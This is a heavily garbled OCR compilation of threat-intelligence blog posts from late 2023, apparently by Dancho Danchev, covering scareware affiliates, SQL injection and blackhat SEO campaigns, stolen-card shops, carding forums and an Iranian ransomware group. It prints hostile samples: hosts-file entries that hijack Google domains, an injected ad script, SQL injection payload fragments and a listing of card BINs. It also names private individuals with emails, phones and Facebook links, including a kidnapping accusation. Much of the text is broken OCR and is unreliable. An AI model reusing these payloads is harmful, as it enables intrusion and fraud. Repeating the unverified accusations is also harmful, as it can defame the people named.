2. https: //ddanchev.blogspot.com/search/label/Trickbot 
3. https: //archive.org/details/rewards-for-justice-01 


19.11.4 Interrupting the Program to Showcase the BG Dishipts that Kidnapped Me! 
- Part Two (2023-11-24 04:49) 
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[2] 
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CO ae eet, 2 


ivan68@abv.bg MM-GRYUN EOOD POLICE_TROYAN@ABV.BG 


®) ® 


radilina-bg.com troyan-police.com 


i @ 


359898760608 IVAN68@ABV.BG 


pS 


MM-Gryun EOOD 


An image is worth a thousand words. 


Sample photos: 


[3] 
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MIHAEL GRYUN 
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Sample Facebook accounts: 
https://www.facebook.com/profile.php?id=100005932519460 - NaBnuH Teoprues 
https://www.facebook.com/profile. php?id=100030506870037 - Bacun TayescKku 
Stay tuned! 


1, fiteps://adanchev ‘blogepot.con/search/label bulgaria 
2 
3, hivtpe://blogger .googleusercontent.con/ ing/b/R29vZ2n1/AVwkaEgehayZ3CdBT iy 9g6aKQLAK1 3 ghEgru6- cUoFRaQ2c6-¥ 
4 
5, hvtpe: //blogger.googleusercontent .con/ing//R29vZ2x1 /AVwKSEAK]YoS¥pb036. AKDHLJBRPOCceOTGOBWDA0Lg~gDhcD8 


19.11.5 Earning4u Pay Per Install Affiliate Network (2023-11-24 12:13) 


An image is worth a thousand words. 


[1] 
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74.125.45.100 www.secure-plus-payments.com 
74.125.45.100 www.getavplusnow.com 
74.125.45.100 www.securesoftwarebill.com 
74.125.45.100 secure.paysecuresystem.com 
74.125.45.100 paysoftbillsolution.com 
64.86.16.97 google.ae 

64.86.16.97 google.as 

64.86.16.97 google.at 

64.86.16.97 google.az 

64.86.16.97 google.ba 

64.86.16.97 google.be 

64.86.16.97 google.bg 

64.86.16.97 google.bs 

64.86.16.97 google.ca 

64.86.16.97 google.cd 

64.86.16.97 google.com.gh 

64.86.16.97 google.com.hk 

64.86.16.97 google.com.jm 

64.86.16.97 google.com.mx 

64.86.16.97 google.com.my 

64.86.16.97 google.com.na 

64.86.16.97 google.com.nf 

64.86.16.97 google.com.ng 

64.86.16.97 google.ch 


64.86.16.97 google.com.np 
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14.02.2010 


15.02.2010 


17.02.2010 


17.02.2010 


17.02.2010 


| Fresh loader and 25 AV scans 


Statistics 
a 


Date Downloads =| a-T- 3a ar" es Unig instalis 
l | US | | AU R | Other | Asia | 
Total | ; 


[2] 
28383 


28384 


Please, enter validation code 
from unage for .exe access 


~lavade.| 


Code: lavage 


DO NOT use public AV scanners like VirusTotal. 
We scan our .exe every hour special for you. 


Result: 


Norman 242.2010 1:36:48 - vira 02.03.2010 20:33:28 - 


“Squared 02.03.2010 16:50:08 loader.exe KA V8 02.03.2010 12:15:18 loaderexe 
rojan. Win32 InjectlIK rojan HTML Frauds 
Sophos 02.03.2010 18:16:42 loaderexe MalFakeAV-AX PrWeb- 


OneCare 1.3.2010 9:20:50 loader.exe->(UPX) 
rojan:Win32/Hamig,gen!D loader. exe 
rojan: Win32/Hamig.gen!D 


OD32 02.03.2010 22:08:02 loader-exe a variant of 
4 vast 02.03.2010 - Win32/Kryptik.CNF loaderexe 0 UPXv12_m2a 
ariant of Win32/Kryptik.CNF 


[3] 


Please, enter validation code 
from image for .exe access 


y < 


DO NOT use public AV scanners like VirusTotal. 
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<script type="text/javascript"> 

<!-- 

var dd = new Date(): 

var ord = Math. round(Math.abs(Math.sin(dd.getTime () )) *1000000000) * 10000000; 

var fd_pet_sre = new String("<scr"+"ipt sro#\"http://adsfac.us/pct_mx.asp?L"235288ésource=jstord="+tord+"\" t 
document.write (fd pet_src); 

--> 
</script> 
<noscript> 
iframe frameborder 


</noseript> 


<!-- END --> 
<!DOCTYPE html PUBLIC “=-//W3C//DTD XHTML 1.0 Transitional//EN" “http: //www.w3.org/TR/xhtmli/DTD/xhtmli-trans 


<html sonlnse"http://uvw.w3.org/1999/xhtm1"> 


<head> 
<meta http-equiv="Content-Type” content="text/html; charset=iso-8859-1" /> 
<!-- <meta http-equive"Content-Type”" content="text/html; charset=utf-8" /> --> 


<TITLE>EyeWonder :: Interactive Digital Advertising, Rich Media Ads, Video Ads, Flash Ads, Online Advertisin 


<meta name*"keyvords” content*"eye wonder, ecyewonder, eye-wonder, ivonder, rich, media, richmedia, rich medi 
<meta name="description” content="EyeVonder is Interactive Digital Advertisinglis fastest-groving innovator, 
<META HAME="PUBLISHER” CONTENT="EyeVonder Inc."> 

<META HAME="COPYRIGHT” CONTENT="Copyright 2008 by EyeWonder Inc."> 

<META NAME*"REVISIT-AFTER” CONTENT«"7? days”> 

<META HAME="author” CONTENT="EyeVonder Inc."> 

<META HAME="ROBOTS" CONTENT="ALL"> 


<link href*"index.css" rel*"stylesheet” type*"text/css" /> 
<script Language="javascript”>AC_FL_RunContent = 0;</seript> 


<script sro="AC RunActiveContent.js” language="javascript”></script> 
</head> 


1. https: //blogger. googleusercontent .com/img/b/R29vZ2x1/AVvXsEgqnnq0ZAxd1 j 70ZiQpkY JTW5mP1il1Nu08n1G8RsgiAyruH 
SkJxkZIH8uqhUXyLKhzCEdE87F_Og1lAK88ZejytbuYrq8BMDChQZed 


19.11.17. Web Malware Exploitation Kit (2023-11-24 12:15) 
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1. https: //blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEj4um13ddjj7__BkpIRXmzX7pP9_bB2mwmwUXfy-GyMJGEh 
gxzpDZAzZtNTituK1DWxtDDLOykcaZVGkmEJvqALZxX9nNS8pqjUD81 


19.11.18 SQL Injection Attack Campaign (2023-11-24 12:15) 
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HBtk: [Metp://wwe. google cn/seareh?as_qinurlKJA aspKiFi dXSD# andt inti t] eMIAKESHBSHACRESISPAESA compl ete=1Ahl=eh-CMAnewrindow=1enun=1C | S95! | (Bik | SHR | GIB | dist 


MA Gk #8 AR MH ME ES vy gz * me | 
&F | m= 
Google finutl:.aspid= and intitle: 4S) EA a: 
CRAM COMM CmERKAIM CF 7: forse 
ay PE a on/Shep/Eol, asp?i d=a27 
PAS 69 13,900 000475 Sinurl:.asp7id= and intitle: AM MRMOAR, LF: sins, com/ about. axp7i d=! 


the com/C¥/ show. asp?i4=1127 
}. com/comp/ content. asp7i de34300 
+ com, co products list. asp7id=l 
edu. cai ewnews. asp7id=1577 
voxue. coa/ school. axp?i 4=38T3 
i. com/ co. asp?i 620652 


MER: RMT WR". RESTS aweTIA. 


= 2A »P w, pes divs protest asp?id=S42 
SMAERSRA-ROLMORARANAA: RAMLAM. RAMI | Neal enr FAA sherners 9 118 
el. RRR. RVRPSHSS. Re Reenwe. + | sallker. net/ detail. asp?idx2046 
aT a ceed cnatsect/ shee, enphi d= 289 
werw.cgiBO. com/userweb/company asp7id=55442 - 22k - rae. com. en/coindex. asp?ID=131 
PAZRAR - SKITS Ra: http: //wew. tbj. cn/ index. asp?i de 753 


J 1 feta Q BiH 


SEMIS BG | 

Rane aR MEAT ABM TARR OBS NwRe 
bttp://wew, en/infe. asp?ide6 1609 —==== wD SS + aD eS = AMD Oath a REALAT A fi 
bttp Jf sbertech. con/shownews. asp? S261 —>—>>>= WSS + MSS AMD ath 8 +H PRBRIALAR 
Bttps//wew. sbartech con/PreductShow. « 6796 a WD 6S + AMD S=3 = AMD FH zie PRR At 
Attpo/ swe va com/sinonews/list, asp?i 433 jl wD 8-3 + aM G3 AND RH +H TAMMIE AE c0040e21,: 
Bttps/ sree, gov, cn/qynl/ corporation» 2672 ——, 85+ wD S3 |= AMD RH +e BaF CEM 80040021,; 
Bttp://iwe. com/OOewn/li st. axp?id=6¢ 4610 zz eS + aM G3 | AMD Rh +a LSREC RAH 
ttp://wew. _ com. enfproducts list. asy 4781 —Lh >a a 8-8 + AMD G=3 0 AMD Rh +A PHRMA C TAH > BO0Ge21,: 
tip: //iwe. iba com/C¥/show. asp?id=11i SOT8 i” aiDG=8 ¢ aNDG=3 AND Rh #2 REN AMA A 
Attp://de « con/rfbe/ rine. asp?id=78 S18 ———) Xek 823 + XoR GB NOR ath a PERERA y- 


1. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEgWosPF8ASKykf _B1LGkhbJ_ZpvHa2rp_kL_hhx38iTb099 
mcuBD5CrBFDdEOxeVQTZM9GinevDXoGphjV8rhW_mbRv_hTR7ulItK 


19.11.19 Blackhat SEO Campaign (2023-11-24 12:15) 
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ivi 
Fal nity //news aD is 


| 3 | http //news 
| 4 | Nit p Jews 
| 5 | ntip Jews 
| 6 | nitp /new 
ral Hit p Anew 
(esa nitp. 


Nip sews 3 


newss 


Nip 7 rews 


Nip /news aS 


| 12 Jhttp/newsa09 is- 


| 13 | nitp J new 
| 14 | http//news a9. i 
15 | Hip Jews 3 
| 16 | hitp //news aS 
| 17 | Nip news alo 
| 18 | Nip /news aS 
| 19 fhttp Hine 
| 20 Jhttp- news 
| 21 fhttp-//new 
nip snews 
nitp sinew 
Hip Usnews s 
Nip. 
| 26 | Nip f/news als 
| 27 | Nip jinews 


Hews 4 


| 28 | nitp /news a9 is 


29 Ihttp//new 
| 29 | 


nitp //news aS is 


nitp // ney 
Hip /inews 3 


. r 
OLE 41-4.2-3- 

| 34 | Nip is res 

| 35 | Nitp Anews aS 


36 [http /newsa09 is. 


_S) gm oF SO) SD) 


[1] 


clastmod | |nst:changetreq (+ )nst:priority [| 
orrvjune-6. biter! 6/5/2009 monthly 0.6) 
omanna-hansen-wikihim| = 6/5/2009 monthly 05 
omthe-hangover-cast htm 6/5/2009 monthly 05 
om/yo be nim 6/5/2009 monthly 0.7) 
om/in-plain-sight. htm 6/5/2009 monthly 0. 
om/im-a-celebrity-usa htm 6/5/2009 monthly 0.4 
om/rei-misterio, htrn! ——— _ 6/5/2009 monthly | 04) 
orvgwyneth-paltrow-husband Atm! 6/5/2009 monthly | 0.6] 
om/el-pais-berlysconi html 7 a _ 6/4/2009 monthly _ 0 
orvig-glance html 6/4/2009 monthly 0. 
on/operation-tiger htm 6/4/2009 monthly 0. 
om/craigslist-detroit htm 6/4/2009 monthly 0. 
om/addicting-games htm 6/4/2009 monthly 0. 
om/nationaldoughnut-day html 6/4/2009 monthly | OL 
VITVGalhv DSTO Pith 6/4/2009 monthly 0. 
om/lakers-ys-magic-live-siream htm 6/4/2009 monthly 08 
orrv/gnbt-stock htrmn 6/4/2009 monthly 0. 
onvmichael-hytchinson him 6/4/2009 monthly | 07 
om/brownish-songbird him 6/4/2009 monthly 06 
om/revolver-musique him 6/4/2009 monthly 0. 
om/boyd-coddingaton-death htm 6/3/2009 monthly 0. 
om/auschwitz-concentration-camp. htm 6/3/2009 monthly 0. 
omvtagged-inc, htm! a 6/3/2009 monthly — | oF 
orryvgee rt-wil Hers irr 6/3/2009 monthly 0.6 
omvhr-puyfi-n-stuff him 6/3/2009 monthly a Oe 
om/lakers-vs-magic htm 6/3/2009 monthly 0.5) 
3. com/cesmondg natcnett him 6/3/2003 monthly 0. 
om/Kate-morgan. htm 6/3/2003 monthly 0. 
om/kennedy-center, htm 6/3/2009 monthly 07 
om/cy-young. htm 6/2/2009 monthly 0.7 
OrvObc-weaiher-manchesier nim 6/2/2009 monthly 0. 
omlakers-ys-magic-game-1 him 6/2/2009 monthly 0.7] 
om/muse-lickets him on 6/2/2009 monthly 0.6) 
om/grand-old-days-st-paul-2009. htm 6/2/2009 monthly 0. 
comice html 6/2/2009 monthly 0.5 
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1. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVVvXsEh1dKzQkA2Hf _OccyUWStHRgs-isospB_fo3dYF5gKIEBaDo 


s com/eminem-b 0-fa 


om/ko-yong-hul 


£0 adden-2010 html 


om/lebron-james-sore-lose 


om/men-ys-wild-full-api 
om/holly-steele. htm! 
om/447-victims htm 
om/frenchopencom 
om/annie-bierman. htm 
om/manana-es-para-sie 
ory oruno- rll 


om/bois e-uniforms 


ke html 


om/sandra-boss-mckinse 


om/nadal-girlfriend htm 


ss com/t20-world p-wa4rm 


om/heidi-montag html 


ss_com/david-garrett-violinis 


om/b e-harper-baseba 


om/arligh-ravago. him 


om/kristen-stewart-boyfrie 


om/natal-video. htm 
om/ortega-henderson-pi 
om/victims-of-flight-44 
om/benign-growth-in-mo 
ean-goldman. him 


res 


SA6YA2eh21S5UbChoGuF f IpUQaqs3 jUfEgWVu0Z7TIqxwsc24vUB-v 


we slastmod |» /nst:changefreq |» |nst:prio 


6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/5/2009 monthly 
6/4/2003 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2003 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/4/2009 monthly 
6/3/2003 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2003 monthly 
6/3/2009 monthly 
6/3/2009 monthly 
6/3/2009 monthly 


6/3/2009 monthly 


6/3/2009 monthly 


19.11.20 SQL Injection Attack Campaign (2023-11-24 12:15) 
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[2] 


Licom.com fcnwk.1d/html/rbsjs/tiburo... QO application)... 
chkpt.zdnet.com /chkpt/924192239q10891... 0 text/plain 
adlog.com.com jadlog/i/r=7009%s=50181.,., 0 image/saif 
dw.com.com  fisfdw.js 1 
wiwiw.cnet.com  fi/b.jpaq 304 = image/jpeg 
Licom.com fcnwk,id/Ads/common/do... 0 mage/ gif 
Licom.com fcnwk.1dji/tron/vader/bg... mage; gif 
i.com.com {cnwk, 1d/i/tronforeo/site... 0 image/png 
i.com.com fcnwk. 1d/i/tronforeofsite... mage/png 
Licom.com  fcnwk.1d/iftron/vaderjne... 0 image/png 
dw.com.com  frubicsimp/c.gif?ver=2éts... 43 image/aif 
Licom.com  fcnwk. 1d/ifb. gif 0 = image/aif 
com.com fcnwk, 1djiftron/vader/ne... 0 image/png 
adlog.com.com fadlog/i/r=11648%s=8096... 0 image/saif 
J.com.com fcnwk,1d/Ads/commonjad... 0 = image/gif 
adlog.com.com fadlog/ifr=10004%s=8261... 0 image/saif 
loverzpoint info 0 
com.com  fcnwk, 1d/iftron/yader/ne... 0 image/png 
Licom.com fcnwk.1d/iftronjvader/ne... 0 = image/gif 
i.com.com  fcnwk., 1djiftron{vader/sit... 0 image/png 
Licom.com fcnwk. 1djiftronjvader/hr. gif 0 = image/gif 
J.com.com  fenwk.1dfAds/8520/10/72... 0 = image/aif 
com.com  fcnwk, 1dji/tiburon{hhidot... 0 mage; gif 
Li.com.com jcnwk. 1d/i/tron/oreo/rbLo... 0 image/png 
mads.download.com /mac-ad?SP=16&_RGROU... 679 text/html; c... 
pn2.adserver.yahoo.com ja?f=2023733315&pn=cn... 588 = text/html; c... 
pn2.adserver.yahoo.com jfa?f=2023424526&pn=cn... 588 = text/html; c... 


Licom.com  fcnwk, idjfi/tron/vader/ne... O image/gif 
Licom.com  fcnwk. 1djiftiburonfhh/187... 0 image/aif 
iicom.com  fcenwk.1dfi/tronjiconjratin... O image/gif 
iicom.com  fcnwk. idfi/tiburon/hh/flex... 0 image/gif 
iicom.com fcnwk.1d/iftronjsiconjratin... 0 image/aif 
Licom.com cnwk.idsiftronsicon{post... 0  imagesaif 


[3] 


beat</p> 
fe</p> 


his a coopcceccecoooool<hr /><br /><epan cRase='notityleg’> Updated </span>on Nov 4, 2000<p/>"'"éor;éitrecript axc=* ERPEMREME EERE Cots eice/a 


1. fivtps:/ logger googleusercontent  con/ing/b/2DvZ2n1/ AV KaBhcac~2lDaSGa3YQhD 148i Zalix iM TiScunlFajcOni6i 
2. hteps:/ blogger. googleusercontent.con/ing/o/R29v22x1/AVWKsEgETQQLVICkPOznuL Wavin0HaseDpDeTBrSSKu6i0Ziyiq 
3. lntps:/ logger googleusercontent.con/ing/b/R20v22x1/ AVWTaENSZsai RF JaG3QHVTINhuDiva JOSFAqeatvoY VxBAcV6- jd 


19.11.21 Compromised CPanel Offered for Sale (2023-11-24 12:16) 
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Fix Insecure Pormissoons 


(Scripts) Main >> Resellers >> Show Reseller Accounts 
Manage SSH Keys 
Manage Wheel Group Users 
Quick a Reseller List 
Scan for Trojan Horses 
Securty Center User Domain 
=) ie Server Contacts 
root Total: 695 accounts System 
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ouru addyoururl info 
= ~C addyou dy oururt.i 
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[ Pe d 
passable oe afair afairfight.com 


Corfigure PHP and Sufxec 
Exim Configuration Editor ofus 


- absebnfoundation.org 
FTP Server Configuraton 


FTP Server Selection agecat oge.cat 
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Madtserver 
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Manage ortificates 
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PHP Configuration Editor akosh akosh.vonetwork.com 

Service Manager 
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alitalk alitelk.vonetwork.com 
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dnsoz_Host20 
vodien_CH10 
undefined 
jrvedine_100 
undefined 
undefined 
undefined 
mrosh_S-28-750 
undefined 
undefined 
undefined 
dnsoz_Host20 
undefined 
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undefined 
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undefined 
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SVB BY w9 


1. https://blogger . googleusercontent . com/img/b/R29VZ2x1/AVvXsEjROJHUE-WtPHgalwi_fAnON2y77sHHrkWPmnQpRs7ZtvbF 
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19.11.22 Image Spam Generating Tool (2023-11-24 12:16) 


An image is worth a thousand words. 


[1] 
28430 


CIALIS Best Price $0.9 No hidden charges 

Cialis 20 sg x 48 Pills = €95 | 100 Pills -¢1€S5 | 200 Pills = €285, Fast Shipping 
100% SATISFACTION Assured, Money Back Guatantees, F0000+Satistied US, UK, CANADIAN 

Customers! VISA/AMEX 


http: //superfarmeashop . com! v kaner a 


CIALIS Best Price § 0.9 No hidden charges 
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1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVvXsEgKRZC1JNQnf£MVRFVMueiQLzZhe6x_iWmzafmVwL4GpC ju7d 
FHYQoZ811UvBc JdFHFVbRXZL- J9iRWGgcbH9ikovfRtTO_OJks_Xx 


19.11.23 Crowdsourced Iran DDoS Attack Campaign (2023-11-24 12:16) 
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19.11.24 Dancho Danchev’s Videos (2023-11-27 20:26) 


Dear blog readers, 


Find below some [1]videos courtesy of [2]me and stay tuned for more. 


DANCHO DANCHEV 
SPEAKS! 


The World's Most Popular and Often Cited Security Blog! 
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LIVE CYBER THREAT MAP 
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Dancho Danchev 

Independent Contractor 
https:/ddanchev. blogspot.com 
Email: dancho.danchev@hush.com 
+359876893890 


Dancho Danchev 

Independent Contractor 
https://ddanchey. blogspot.com 
Ernall: dancho.danchev@hush.com 
+359876893890 
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https://ddanchey. blogspot.com 
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GHOST SECURITY 


GHOSTSEC TEAM MEMBERS 
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Dancho Danchey 

Independent Contractor 
https:/ddanchey. blogspot.com 
Email: dancho.danchev@hush.com 
+35987 6893890 
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Stay tuned! 


1. https://youtube . com/@danchodanchev8774?si=7eCvebw3n9NHeHse 
2. https: //youtube.com/@ddanchev?feature=shared 


19.12 December 


19.12.1 Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details (2023-12-01 14:14) 


[1] 
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BINs: Last4dig: Country: Bank: Code: Level: CredivDeba: Type: Base: 
(+$1) (+$1.5) {(+$1) 


al "| Any (584(]] [Any (584(]=] [Any (5840) [=] [Any (5840) [=] [Any (5840) [=] [Any [=] [FRESH Uy] 


Cards found: 840 

304800 owns Nia UNKOWN BANK 3 NIA 101 TR2 ONLY $16.00 cr 

401184 12/13 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC cesT 101 TR2 ONLY $16.00 3 
OF AMERICA | 

401154 Ons UNITED STATES | VYSTAR CREDIT UNION | CLASSIC Desir 101 TR2 ONLY $16.00 cc 
OF AMERICA 

401184 1013 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC best 101 TR2 ONLY $16.00 = 
OF AMERICA 

4011s4 omi2 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC | DESrT 101 TR2 ONLY $16.00 GC 
OF AMERICA 

401184 omi2 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC | Desir 101 TR2 ONLY $16.00 - 
OF AMERICA 

} | | | 

401154 1193 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC DEBIT 101 TR2 ONLY $16.00 Cc 
OF AMERICA 

401154 om13 UNITED STATES | VYSTAR CREDIT UNION | CLASSIC CeBIT 101 TR2 ONLY $16.00 rc 
OF AMERICA 

} | | 

401160 oui3 UNITED STATES | COMMUNITY CREDIT CLASSIC | DEBIT 101 TR2 ONLY $16.00 Cc 
OF AMERICA UNION 

401266 1018 UNITED STATES | SERVICES CREDIT | CLASSIC cesT 121 TR2 ONLY $16.00 Go 
OF AMERICA UNION 

401666 1112 UNITED STATES | BRIGHTSTARCREDIT | CLASSIC DEBIT 101 TR2 ONLY $16.00 cS 
OF AMERICA UNION 

401838 ow13 UNITED STATES | BETHPAGE FEDERAL | CLASSIC OEBIT 101 TR2 ONLY $16.00 = 
Of srr CREMT I BewW 


The following are personally identifiable email address accounts including domains known to 
belong to owners of E-Shops for stolen credit card data. 


Sample domains involved include: 
ccmall.cc 
track2.name 
trackstore.su 
magic-numbers.cc 
allfresh.us 
freshstock.biz 
bulba.cc 
approven.su 
cv2shop.com 
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vzone.tc 

ccStore.ru 

dumps.cc 
privateservices.ws 
perfect-numbers.cc 
mega4u.biz 

accessltd.ru 

pwnshop.cc 
bestdumps.su 

mycc.su 

bestdumps. biz 
dumpshop.bz 
cardshop.bz 
dumpscheck.com 
Sample email address accounts involved include: 
roger.sroy@yahoo[.]com 
keikomiyahara@yahoo[.]com 
bulbacc@yahoo[.]com 
yurtan20@el[.]ru 
ccstoreru@yahoo[.]com 
persiks@online[.]ua 
admin@accessltd[.]ru 
bestdumpssu@live[.]com 
admin@mycc[.]su 
admin@bestdumps[. ]biz 
bdsupport@jabber[.]org 
Stay tuned! 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEj dDeUZYLVk4gu- HOsg1Pj AXLH8x9eAFeBjuwaAdXA1ZHBQa 
EGaJDHpEhOmIndBgoWO8DydCxHVmWCMJm8DLNdHeeolosUh_Px_7u 


19.12.2 Iran’s Afkar System Yazd Co Ransomware (2023-12-01 14:15) 


[1] 
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The following is all the associated ransomware themed domains known to have been associ- 
ated with Iran’s [2]Afkar System Yazd Co ransomware. 
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Sample domains known to have been involved in the campaign include: 
hxxp://newdesk.top 

hxxp://onedriver-srv.ml 

hxxp://symantecserver.co 

hxxp://microsoft-updateserver.cf 

hxxp://msupdate.us 

hxxp://service-management.tk 

hxxp://aptmirror.eu 

hxxp://winstore.us 

hxxp://my-logford.ml 

hxxp://gupdate.us 

hxxp://tcp443.org 

Sample email address accounts known to have been involved in the campaign include: 
amirbitminer[.]gmail.com 

thund3rz[.]protonmail.com 


1. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEhympAI9v9pcV jKEb1h63PgbDh7 yMdUst pR7 JseCxVOOLp4d 
B4zU8mj v1BIqC8sK2XKT1CWMEngyHf j JO4YOE_dp40A4rpvBViA46i 
2. https: //rewardsforjustice.net/rewards/ahmad-khatibi-aghda/ 


19.12.3 Email Address Accounts Known To Belong To Owners of E-Shops for Stolen 
Credit Card Details - Part Two (2023-12-01 14:15) 


[1] 
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64.86.16.97 google.co.ug 
64.86.16.97 google.co.uk 
64.86.16.97 google.co.za 
64.86.16.97 google.co.zm 


64.86.16.97 google.com 


= > 


Victoria T. 


Age 19 years old 


66 | am searching for kind, sympathetic and 
teel legs person with sense of humor. 


2007-2009 Contact Us Register for free 


The historical OSINT paragraph mentioned that several of the scareware domains pushed 
during the past two weeks were responding to 62.90.136.237. This very same 62.90.136.207 
IP was hosting domains part of an [59]Ukrainian dating scam agency known as [60]Confiden- 
tial Connections earlier this year, whose spamming operations were linked to a [61]botnet 
involved in money mule recruitment activities. 
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The following are personally identifiable email address accounts including domains known to 
belong to owners of E-Shops for stolen credit card data. 


Sample email address accounts include: 
admin@accessltd[.]ru 
rubensamvelich@gmaill[.]com 
rubensamvelich@yahoo[.]com 
bulbacc@rocketmail[.]Jcom 
bulbacc@yahoo[.]com 
000.service@yahoo[.]com 
dumps.cc@safe-mail[.]net 
b2b.maxim@gmaill[.]Jcom 
Ivjiecong@yahoo[.]com[.]cn 
roger.sroy@yahoo[.]com 
elche011@yahoo[.]com 
keikomiyahara@yahoo[.]com 
dcb725@gmaill.]Jcom 
wattt80@yahoo[.]Jcom 
yurtan20@el1[.]ru 
vipforexbiz@gmail[.]com 
kachanaburi@yahoo[.]com 
persiks@online[.Jua 
alexandanns@gmail[.Jcom 
bestdumpssu@live[.]Jcom 
admin@mycc[.]su 
admin@bestdumps[. ]biz 
tonchang2011@yahoo[.]com 
ccstoreru@yahoo[.]com 
bdsupport@jabber[.]org 

Stay tuned! 


1. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEgONr 1NXLc9gwthg7GV6LMi35CCnYDEZOVXNxBtzTBO5t2NQ 
OioYPely1X7ImNnq0t31kd0sRmv2LDtTerDtGe4S52EHbz8RZFHKwa8s 
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19.12.4 Cybercrime-Friendly Forum Communities - Part Two (2023-12-01 14:16) 


Cybercrime Forum 
Data Set 2021 


FULL OFFLINE COPIES OF OVER 117 PUBLICLY 
ACCESSIBLE 
COMMUNITIES! LET'S SET THEM STRAIGHT! 


The following is a compilation of currently active cybercrime-friendly forum communities. 


Cybercrime-friendly forum communities include: 
hxxp://crdforum.cc/ 
hxxp://darkwebmafias.net/ 
hxxp://darkstash.com/ 
hxxp://crdpro.cc/ 
hxxp://www.cardingclub.net/ 
hxxp://www.russiancarders.se/ 
hxxp://validmarket.io/ 
hxxp://cardingforum.cx/ 
hxxp://carding.sh/ 
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hxxp://bitcarder.com 
hxxp://cardingleaks.ws/ 
hxxp://www.verifiedcarder.net/ 
hxxp://www.legitcarder.ru/ 
hxxp://www.crdworld.com/ 
hxxp://cardingmafia.to/ 
hxxp://cardingforum.cx 
hxxp://crdforum.cc 
hxxp://darkstash.com 
hxxp://carders. biz 
hxxp://crdpro.cc 
hxxp://carders.mx 
hxxp://carding-forum.com 
hxxp://crdclub.su 
hxxp://procrd.pw 
hxxp://cardmafia.cc 
hxxp://cardingforum.info 
hxxp://cardingleaks.ws 
hxxp://darkpro.net 
hxxp://crackingforum.to 
hxxp://cardingworld.ru 
hxxp://darkwebmafias.ws 
hxxp://leetforums.ru 
hxxp://legitcarders.ws 
hxxp://crdcrew.cc 
hxxp://prtship.pro 
hxxp://verifiedcarder.net 
hxxp://legitcarder.ru 
hxxp://carders.zone 
hxxp://drdark.ru 
hxxp://darknetweb.ru 
hxxp://bpcforum.ru 
hxxp://wc-club.com 
hxxp://cybercarders.com 
hxxp://bitorder.pw 


1. https: //blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEgm81PiYpLELTtHHKTHH5ABO-f 1BGVv3Y7SdC8d9kLkjN_JI 
9D80rRdrXL73MO0owp57Ws214b0WU64J3t J-f0s3LEgHmGEcRvuu9M- 
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19.12.5 Rewards for Justice - Dancho Danchev (2023-12-01 14:16) 


[1] 


The following are domains and personally identifiable information on a bulletproof hosting 
provider mentioned by the Conti Ransomware gang. 


hxxp://school-global.ru 
hxxp://youladance.ru 

Teneqmou: +373 775 96666 

E-mail: info@morene[.]host 

Skype: morene[.]host 

Jabber: morene@jabber[.]morene[.]host 
ICQ: 700812649 / 702647156 

Telegram: @hostmorene 

Viber: +373 775 96666 

WhatsApp: +373 775 96666 


OuHNanH-YaT: https://morene[.]host 


1. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEj eNRZKfXp0O1GWWkOWnxS2roHK-rR5QZwmCn9KtS_i7BrZvb 
aBkKH j VzwrTMk1XskCQfkoYAdwIgIBKuuf AwuGWD6eKU jhiXLjybnt 
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19.12.6 Full Names of Ashiyane Digital Security Team Members (2023-12-01 14:16) 


[1] 


The following compilation is a set of full names of Ashiyane Digital Security Team Members. 


The following are the full names of Ashiyane Digital Security Team Members: 
Keyvan Sedaghati — keivan 
Ramin Baz Ghandi — frOnk 
Erfan Zadpoor — PrinceofHacking 
Hamid Norouzi — eychenz 
Poorya Mohammadrezaei — Hijacker 
Omid Norouzi — Sha2ow 
Milad Bokharaei — ®Maste 
Vahid Maani — WAHID 2 
Kaveh Jasri — root3r 
Ali Hayati — Zend 
Milad Mazaheri — mmilad200 
Mohammad Reza — iNJECTOR 
Mohammad Mohammadi — Classic 
Nima Salehi — Q7X 
Milad Jafari — Milad-Bushehr 
Shahin Salak Tootonchi — ruiner _blackhat 
Amin Bandali — anti206 
Mohammad Hadi Nasiri — unique2world 
Mahdi Chinichi — Virangar 
Amir Hossein Tahmasebi — __amir__ 
Ashkan Hosseini — Askn 
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Mohammad Tajik — taghva 

Meghdad Mohammadi — M3QD4D 

Sina Ahmadi Neshat — Encoder 

Behrouz Kamalian — Behrouz _ice) 
Farshid Sargheini — Azazel 

Armin — n3me3iz 

Mahdi K. — r3d.zOnE 

Iman Honarvar — iman _taktaz 

Ali Seid Nejad — Ali Eagle 

Mohammad Reza Ali Babaei — mzhacker 
Navid Naghdi — elvator 

Mohammad Reza Dolati — HIDDEN-HUNTER 
Mehrab Akherati — AliAkh 


Amin Javid — Gladiator 


1. https: //blogger . googleusercontent .com/img/b/R29vZ2x1/AVvXsEi7IyBYLem0PprQN3d1WJtxQInJdz-Yn8N_PzzsdtiLbtoQ9 
bvsSAPodvi4idNJck4xSAnGiUc13KApTawG8zBak7DP Je3w_HZOV9b 


19.12.7 Cybercrime-Friendly Forum Communities (2023-12-01 14:16) 


[1] 
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SET 2021 


OVER lll FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
